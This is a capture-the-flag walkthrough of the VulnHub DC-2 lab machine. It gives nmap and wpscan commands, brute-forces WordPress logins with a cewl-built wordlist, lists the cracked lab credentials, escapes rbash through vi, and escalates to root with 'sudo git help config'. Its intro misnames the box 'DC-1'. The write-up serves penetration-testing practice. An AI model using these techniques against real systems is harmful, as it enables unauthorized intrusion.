DC-2 Writeup

Hello friends, I would like to thank you for reading this blog. This time is to complete another boot2root challenge of a box known as “DC-1” and all the credit goes to @DCAU for creating this box. So, our challenge is to get root access to this machine. To download this go to vulnhub.com

Or

https://www.vulnhub.com/?q=dc-2

This is also a beginner-level machine. 

Walkthrough steps:

Step 1:

IP Discovery:

nmap -sn 192.168.56.1/24

Step 2:

Network Scanning:

nmap -sC -sV 192.168.56.110

Step 2:

Network Scanning:

nmap -sC -sV 192.168.56.110

Step 3:

Checking the port 80:

As we can see port 80 is open there so we can open it with a web browser. After trying to open the IP is redirecting to a domain which is http://dc-2 but nothing is opening.

To open this domain we need to add the IP address and the domain to the /etc/hosts file.

nano /etc/hosts

Now the domain will open. As we opened the domain we found WordPress CMS is running.

Step 4:

Scanning this WordPress site:

To scan a Wordpress site there is an inbuilt tool in Kali Linux which is wpscan. So, the command to scan this site is

wpscan --url http://dc-2

After scanning the result is like

wpscan --url http://dc-2    

_______________________________________________________________

         __          _______   _____

         \ \        / /  __ \ / ____|

          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®

           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \

            \  /\  /  | |     ____) | (__| (_| | | | |

             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team

                         Version 3.8.18

       Sponsored by Automattic - https://automattic.com/

       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

_______________________________________________________________

[i] It seems like you have not updated the database for some time.

[?] Do you want to update now? [Y]es [N]o, default: [N]n

[+] URL: http://dc-2/ [192.168.56.110]

[+] Started: Fri May 27 06:00:51 2022

Interesting Finding(s):

[+] Headers

 | Interesting Entry: Server: Apache/2.4.10 (Debian)

 | Found By: Headers (Passive Detection)

 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

 | References:

 |  - http://codex.wordpress.org/XML-RPC_Pingback_API

 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/

 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/

 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/

 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 60%

 | References:

 |  - https://www.iplocation.net/defend-wordpress-from-ddos

 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).

 | Found By: Rss Generator (Passive Detection)

 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen

 | Location: http://dc-2/wp-content/themes/twentyseventeen/

 | Last Updated: 2022-01-25T00:00:00.000Z

 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt

 | [!] The version is out of date, the latest version is 2.9

 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10

 | Style Name: Twenty Seventeen

 | Style URI: https://wordpress.org/themes/twentyseventeen/

 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...

 | Author: the WordPress team

 | Author URI: https://wordpress.org/

 |

 | Found By: Css Style In Homepage (Passive Detection)

 |

 | Version: 1.2 (80% confidence)

 | Found By: Style (Passive Detection)

 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)

 Checking Config Backups - Time: 00:00:00 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.

[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri May 27 06:00:56 2022

[+] Requests Done: 171

[+] Cached Requests: 5

[+] Data Sent: 39.416 KB

[+] Data Received: 356.633 KB

[+] Memory used: 232.211 MB

[+] Elapsed time: 00:00:05

By looking at this scan result nothing is found to exploit.

Step 5:

User enumeration:

As we know a wordpress site contains a login page. So it must have at least one user in it. On the Wordpress site we can use wpscan for user enumeration.

wpscan --url http://dc-2 -e u

Step 6:

Brute Forcing for password:

We will save these 3 usernames in a file. In my case I will save it as username.txt and as a password list I will use password.txt. But the normal wordlist as password will not work here because if you look at the Flag section on the website and read what is written there it will mean to use cewl tool to grab all the words available on the website and will save it as password.txt

wpscan --url http://dc-2 -U username.txt -P password.txt

The username and password is

jerry / adipiscing                                                                                                                                                                                                              

tom / parturient

Step 7:

Trying to login with the jerry credentials into the wordpress site login page. Follow the pages section and then all pages. There you will find an Add New button that we can use to upload our reverse shell.

Then publish. After publishing it will look like

Step 8:

Start a nc listener which will capture the response from the victim after running the page we just published.

But there is no way to run the reverse shell file from there. So, we need to find another way to get into the shell. But we do not have another way to get into it till now. Maybe we are missing something during network scanning. Maybe there is another port open and we don’t know because we did not run a full port scan. After running a full port scan we found another port open, which is 7744 for ssh.

And we remember we got two passwords of two users accordingly and we can use them to connect through ssh (Port number 7744).

Step 9:

Through tom user, I was able to log in through ssh. While running some commands it is saying it is rbash so we need to bypass it then we can run all these commands. Then I tried all the steps which I am going to show you in screenshots.

Press ENTER

vi

:set shell=/bin/sh

:shell

Now if you add your system’s $PATH to the bypassed shell then you will be able to run all the cd, pwd, cat, etc. commands and also can read the flag with cat command.

Step 10:

As the screenshot is saying the flag3 gives a hint to su with jerry user.

Step 11:

Now run sudo -l on this jerry shell it will show us that it has sudo permission with /usr/bin/git. So, we can use this permission to exploit to get root permission on the system.

sudo git help config

!/bin/sh

Step 12:

Now you will get the final flag or root flag.